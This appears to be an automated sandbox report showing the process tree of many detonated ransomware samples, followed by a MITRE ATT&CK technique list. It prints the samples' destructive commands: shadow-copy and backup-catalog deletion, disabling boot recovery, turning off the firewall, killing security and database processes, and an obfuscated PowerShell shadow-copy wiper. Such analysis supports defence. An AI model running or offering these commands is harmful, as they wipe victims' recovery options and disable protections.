- - C:\Users\Admin\Desktop\00434\HEUR-Trojan-Ransom.Win32.Generic-11e5d7ef5bdcb1a257da2b40318ec6dd16864bc0e69274dd016899cb92c389fd.exe
    HEUR-Trojan-Ransom.Win32.Generic-11e5d7ef5bdcb1a257da2b40318ec6dd16864bc0e69274dd016899cb92c389fd.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4156
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c net stop MSDTC
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3804
    - - C:\Windows\SysWOW64\net.exe
        
        net stop MSDTC
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4464
      - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSDTC
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2436
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
      4⤵
      PID:1924
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c bcdedit /set {default} recoveryenabled no
      4⤵
      PID:4916
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c wbadmin delete catalog -quiet
      4⤵
      PID:3976
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c net stop SQLSERVERAGENT
      4⤵
      PID:6804
    - - C:\Windows\SysWOW64\net.exe
        
        net stop SQLSERVERAGENT
        5⤵
        
        PID:6668
      - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SQLSERVERAGENT
        6⤵
        
        PID:6192
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c net stop MSSQLSERVER
      4⤵
      PID:6868
    - - C:\Windows\SysWOW64\net.exe
        
        net stop MSSQLSERVER
        5⤵
        
        PID:5368
      - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQLSERVER
        6⤵
        
        PID:6100
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c net stop vds
      4⤵
      PID:5340
    - - C:\Windows\SysWOW64\net.exe
        
        net stop vds
        5⤵
        
        PID:5988
      - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop vds
        6⤵
        
        PID:14024
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall set currentprofile state off
      4⤵
      PID:13824
- - C:\Users\Admin\Desktop\00434\HEUR-Trojan-Ransom.Win32.Generic-27a1f89ce5a37815010c8411dddec85d5d66e81a957ad722fbd2dc64f99651c8.exe
    HEUR-Trojan-Ransom.Win32.Generic-27a1f89ce5a37815010c8411dddec85d5d66e81a957ad722fbd2dc64f99651c8.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    PID:2720
- - C:\Users\Admin\Desktop\00434\HEUR-Trojan-Ransom.Win32.Generic-8c723af5c826adea162ef3f2e37a1cca7b43d549c9a5fab7c9ff17f65eb5d8e7.exe
    HEUR-Trojan-Ransom.Win32.Generic-8c723af5c826adea162ef3f2e37a1cca7b43d549c9a5fab7c9ff17f65eb5d8e7.exe
    3⤵
    - Executes dropped EXE
    PID:4700
  - - C:\Windows\SYSTEM32\taskkill.exe
      "taskkill" /F /IM RaccineSettings.exe
      4⤵
      Kills process with taskkill
      PID:4100
  - - C:\Windows\SYSTEM32\reg.exe
      "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
      4⤵
      PID:6056
  - - C:\Windows\SYSTEM32\reg.exe
      "reg" delete HKCU\Software\Raccine /F
      4⤵
      Modifies registry key
      PID:5144
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /DELETE /TN "Raccine Rules Updater" /F
      4⤵
      PID:6688
  - - C:\Windows\SYSTEM32\sc.exe
      "sc.exe" config Dnscache start= auto
      4⤵
      Launches sc.exe
      PID:6752
  - - C:\Windows\SYSTEM32\netsh.exe
      "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
      4⤵
      Modifies Windows Firewall
      PID:2540
  - - C:\Windows\SYSTEM32\sc.exe
      "sc.exe" config FDResPub start= auto
      4⤵
      Launches sc.exe
      PID:3972
  - - C:\Windows\SYSTEM32\sc.exe
      "sc.exe" config SSDPSRV start= auto
      4⤵
      Launches sc.exe
      PID:6420
  - - C:\Windows\SYSTEM32\sc.exe
      "sc.exe" config upnphost start= auto
      4⤵
      Launches sc.exe
      PID:1252
  - - C:\Windows\SYSTEM32\sc.exe
      "sc.exe" config SQLTELEMETRY start= disabled
      4⤵
      Launches sc.exe
      PID:5268
  - - C:\Windows\SYSTEM32\sc.exe
      "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
      4⤵
      Launches sc.exe
      PID:5176
  - - C:\Windows\SYSTEM32\sc.exe
      "sc.exe" config SQLWriter start= disabled
      4⤵
      Launches sc.exe
      PID:956
  - - C:\Windows\SYSTEM32\sc.exe
      "sc.exe" config SstpSvc start= disabled
      4⤵
      Launches sc.exe
      PID:5644
  - - C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM mspub.exe /F
      4⤵
      Kills process with taskkill
      PID:6704
  - - C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM firefoxconfig.exe /F
      4⤵
      Kills process with taskkill
      PID:6400
  - - C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM excel.exe /F
      4⤵
      Kills process with taskkill
      PID:5912
  - - C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM mydesktopqos.exe /F
      4⤵
      Kills process with taskkill
      PID:228
  - - C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM thebat64.exe /F
      4⤵
      Kills process with taskkill
      PID:7000
  - - C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM agntsvc.exe /F
      4⤵
      Kills process with taskkill
      PID:5584
  - - C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM CNTAoSMgr.exe /F
      4⤵
      Kills process with taskkill
      PID:5928
  - - C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM mydesktopservice.exe /F
      4⤵
      Kills process with taskkill
      PID:6640
  - - C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM ocomm.exe /F
      4⤵
      Kills process with taskkill
      PID:6816
  - - C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM thebat.exe /F
      4⤵
      Kills process with taskkill
      PID:2708
  - - C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM sqlwriter.exe /F
      4⤵
      Kills process with taskkill
      PID:5520
  - - C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" IM thunderbird.exe /F
      4⤵
      Kills process with taskkill
      PID:10152
  - - C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM steam.exe /F
      4⤵
      Kills process with taskkill
      PID:9376
  - - C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM mysqld.exe /F
      4⤵
      Kills process with taskkill
      PID:2832
  - - C:\Windows\SYSTEM32\netsh.exe
      "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
      4⤵
      Modifies Windows Firewall
      PID:9096
  - - C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM dbsnmp.exe /F
      4⤵
      Kills process with taskkill
      PID:9992
  - - C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM isqlplussvc.exe /F
      4⤵
      Kills process with taskkill
      PID:10340
  - - C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM infopath.exe /F
      4⤵
      Kills process with taskkill
      PID:12412
  - - C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM tbirdconfig.exe /F
      4⤵
      Kills process with taskkill
      PID:6396
  - - C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM encsvc.exe /F
      4⤵
      Kills process with taskkill
      PID:14100
  - - C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM sqbcoreservice.exe /F
      4⤵
      Kills process with taskkill
      PID:14076
  - - C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM onenote.exe /F
      4⤵
      Kills process with taskkill
      PID:17152
  - - C:\Windows\SYSTEM32\taskkill.exe
      "taskkill.exe" /IM tmlisten.exe /F
      4⤵
      Kills process with taskkill
      PID:17664
- - C:\Users\Admin\Desktop\00434\HEUR-Trojan-Ransom.Win32.Lockbit.vho-b7a17d6f314fa58a8f36b9b15b730ed4f9dde19bc00101f9b0433c733d4d54bb.exe
    HEUR-Trojan-Ransom.Win32.Lockbit.vho-b7a17d6f314fa58a8f36b9b15b730ed4f9dde19bc00101f9b0433c733d4d54bb.exe
    3⤵
    PID:5020
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
      4⤵
      PID:5080
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:4464
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin delete shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:6768
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic shadowcopy delete
        5⤵
        
        PID:6900
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit /set {default} bootstatuspolicy ignoreallfailures
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:7036
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit /set {default} recoveryenabled no
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:4376
    - - C:\Windows\system32\wbadmin.exe
        
        wbadmin delete catalog -quiet
        5⤵
        Deletes backup catalog
        
        PID:5784
- - C:\Users\Admin\Desktop\00434\HEUR-Trojan-Ransom.Win32.Stop.gen-25b21e9e98f55e0e430637560ada56b5eb7d68b69c486c188f233cc83b1bae53.exe
    HEUR-Trojan-Ransom.Win32.Stop.gen-25b21e9e98f55e0e430637560ada56b5eb7d68b69c486c188f233cc83b1bae53.exe
    3⤵
    PID:1044
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 976
      4⤵
      Program crash
      PID:6316
- - C:\Users\Admin\Desktop\00434\Trojan-Ransom.Win32.Blocker.lckf-98c71b2a09aac619e6216958b003368bb896f8c7f18affe28a5756e0442f1096.exe
    Trojan-Ransom.Win32.Blocker.lckf-98c71b2a09aac619e6216958b003368bb896f8c7f18affe28a5756e0442f1096.exe
    3⤵
    PID:4800
- - C:\Users\Admin\Desktop\00434\Trojan-Ransom.Win32.Cryptor.eeu-353f3cad40f4deec18261c649f07e018fdd592b706f6aed709d7cb5ab3844715.exe
    Trojan-Ransom.Win32.Cryptor.eeu-353f3cad40f4deec18261c649f07e018fdd592b706f6aed709d7cb5ab3844715.exe
    3⤵
    PID:3056
- - C:\Users\Admin\Desktop\00434\Trojan-Ransom.Win32.Encoder.mcb-56e7b9c4b8962b6ff0d1e0162ca8515a07b576cd47ba90221354838733f8689a.exe
    Trojan-Ransom.Win32.Encoder.mcb-56e7b9c4b8962b6ff0d1e0162ca8515a07b576cd47ba90221354838733f8689a.exe
    3⤵
    PID:992
- - C:\Users\Admin\Desktop\00434\Trojan-Ransom.Win32.Encoder.mhm-097d28021ffb26cb5b7d2d1377578cd6e2005549e44b5b2491fd310ecf50f7a8.exe
    Trojan-Ransom.Win32.Encoder.mhm-097d28021ffb26cb5b7d2d1377578cd6e2005549e44b5b2491fd310ecf50f7a8.exe
    3⤵
    PID:2404
- - C:\Users\Admin\Desktop\00434\Trojan-Ransom.Win32.Gen.adag-12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe
    Trojan-Ransom.Win32.Gen.adag-12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe
    3⤵
    PID:5224
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:14688
- - C:\Users\Admin\Desktop\00434\Trojan-Ransom.Win32.GenericCryptor.czo-96c8c4c4267b3f070a4c5480380b913e7cbc1b8103809575070c262aa8c843cc.exe
    Trojan-Ransom.Win32.GenericCryptor.czo-96c8c4c4267b3f070a4c5480380b913e7cbc1b8103809575070c262aa8c843cc.exe
    3⤵
    PID:2260
  - - C:\Users\Admin\AppData\Local\Temp\huter.exe
      "C:\Users\Admin\AppData\Local\Temp\huter.exe"
      4⤵
      PID:5948
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sanfdr.bat" "
      4⤵
      PID:5468
- - C:\Users\Admin\Desktop\00434\Trojan-Ransom.Win32.GenericCryptor.czx-4b1e7a0c585492340c9e57afc4c7dd6570acb704f0b6763c5e63dd99eee2fa8b.exe
    Trojan-Ransom.Win32.GenericCryptor.czx-4b1e7a0c585492340c9e57afc4c7dd6570acb704f0b6763c5e63dd99eee2fa8b.exe
    3⤵
    PID:5248
  - - C:\Users\Admin\AppData\Local\Temp\huter.exe
      "C:\Users\Admin\AppData\Local\Temp\huter.exe"
      4⤵
      PID:6600
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\_uinsey.bat" "
      4⤵
      PID:4512
- - C:\Users\Admin\Desktop\00434\Trojan-Ransom.Win32.MountLocker.c-4a5ac3c6f8383cc33c795804ba5f7f5553c029bbb4a6d28f1e4d8fb5107902c1.exe
    Trojan-Ransom.Win32.MountLocker.c-4a5ac3c6f8383cc33c795804ba5f7f5553c029bbb4a6d28f1e4d8fb5107902c1.exe
    3⤵
    PID:6744
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\\0E5966EE.bat" "C:\Users\Admin\Desktop\00434\Trojan-Ransom.Win32.MountLocker.c-4a5ac3c6f8383cc33c795804ba5f7f5553c029bbb4a6d28f1e4d8fb5107902c1.exe""
      4⤵
      PID:9928
- - C:\Users\Admin\Desktop\00434\Trojan-Ransom.Win32.Sodin.afj-5467fe3f38ccf0c56c1aba7cbbc56109b747f7a53c333a3f5a1cfe6094e1fa2b.exe
    Trojan-Ransom.Win32.Sodin.afj-5467fe3f38ccf0c56c1aba7cbbc56109b747f7a53c333a3f5a1cfe6094e1fa2b.exe
    3⤵
    PID:4236
- - C:\Users\Admin\Desktop\00434\Trojan-Ransom.Win32.SuspFile.k-511fee839098dfa28dd859ffd3ece5148be13bfb83baa807ed7cac2200103390.exe
    Trojan-Ransom.Win32.SuspFile.k-511fee839098dfa28dd859ffd3ece5148be13bfb83baa807ed7cac2200103390.exe
    3⤵
    PID:7160
- - C:\Users\Admin\Desktop\00434\VHO-Trojan-Ransom.Win32.Convagent.gen-9b3002401aecad5079077d71abc93628cf60c2c4a634677ee1df10b90bbc592a.exe
    VHO-Trojan-Ransom.Win32.Convagent.gen-9b3002401aecad5079077d71abc93628cf60c2c4a634677ee1df10b90bbc592a.exe
    3⤵
    PID:11776

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2744

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:2332

C:\Users\Admin\Desktop\00434\trojan-ransom.win32.encoder.mcb-56e7b9c4b8962b6ff0d1e0162ca8515a07b576cd47ba90221354838733f8689a.exe
"C:\Users\Admin\Desktop\00434\trojan-ransom.win32.encoder.mcb-56e7b9c4b8962b6ff0d1e0162ca8515a07b576cd47ba90221354838733f8689a.exe" C:\Users\Admin\Desktop\00434\Trojan-Ransom.Win32.Encoder.mcb-56e7b9c4b8962b6ff0d1e0162ca8515a07b576cd47ba90221354838733f8689a.exe
1⤵
PID:3240
- C:\Users\Admin\Desktop\00434\trojan-ransom.win32.encoder.mcb-56e7b9c4b8962b6ff0d1e0162ca8515a07b576cd47ba90221354838733f8689a.exe
  "C:\Users\Admin\Desktop\00434\trojan-ransom.win32.encoder.mcb-56e7b9c4b8962b6ff0d1e0162ca8515a07b576cd47ba90221354838733f8689a.exe" C:\Users\Admin\Desktop\00434\Trojan-Ransom.Win32.Encoder.mcb-56e7b9c4b8962b6ff0d1e0162ca8515a07b576cd47ba90221354838733f8689a.exe
  2⤵
  PID:2212
- - C:\Users\Admin\Desktop\00434\trojan-ransom.win32.encoder.mcb-56e7b9c4b8962b6ff0d1e0162ca8515a07b576cd47ba90221354838733f8689a.exe
    C:\Users\Admin\Desktop\00434\trojan-ransom.win32.encoder.mcb-56e7b9c4b8962b6ff0d1e0162ca8515a07b576cd47ba90221354838733f8689a.exe -work worker0 job0-2212
    3⤵
    PID:5752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1044 -ip 1044
1⤵
PID:5284

C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
1⤵
PID:11044

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2840

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Direct Volume Access

T1006

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Safe Mode Boot

T1562.009

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery